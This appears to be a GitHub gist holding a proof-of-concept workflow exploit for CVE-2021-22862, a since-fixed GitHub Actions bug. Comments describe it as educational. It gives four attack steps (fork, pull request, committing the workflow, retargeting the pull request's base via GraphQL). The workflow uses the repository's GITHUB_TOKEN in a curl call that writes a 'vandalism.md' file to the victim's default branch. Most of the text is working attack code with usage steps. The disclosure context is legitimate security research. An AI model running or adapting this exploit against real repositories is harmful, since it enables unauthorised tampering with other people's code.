Proof-of-concept GitHub Actions workflow exploit (CVE-2021-22862)
| # This is a proof-of-concept for a security bug in GitHub Actions which has since been fixed. | |
| # See https://blog.teddykatz.com/2021/03/17/github-actions-write-access.html for more information. | |
| # The proof-of-concept was only ever used in a test environment to validate the existence of the | |
| # vulnerability, and is shown here for educational purposes. | |
| # | |
| # The proof-of-concept would have the effect of creating a `vandalism.md` file, containing vandalism, | |
| # on the default branch of a victim repository. | |
| # | |
| # To use the proof-of-concept, the steps would have been: | |
| # 1. Fork the victim repository | |
| # 2. Create a pull request from the fork to the victim repository, making any change | |
| # 3. Put this yml file (`vandalism.yml`) in the `.github/workflows/` folder, and commit it to a different branch of the fork | |
| # 4. Use the GraphQL API to set the `baseRefName` of the pull request from (2) to the commit hash from (3) | |
| name: "Proof-of-concept GitHub Actions workflow" | |
| on: | |
| pull_request_target: | |
| types: edited | |
| jobs: | |
| vandalize-repo: | |
| runs-on: ubuntu-latest | |
| steps: | |
| - name: Vandalize | |
| run: 'curl -H "Authorization: bearer $GITHUB_TOKEN" -X PUT "https://api.github.com/repos/$REPO/contents/vandalism.md" --data ''{"message": "Create vandalism.md", "content": "TkFBIHdhcyBoZXJl"}'' ' | |
| env: | |
| GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} | |
| REPO: ${{ github.repository }} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment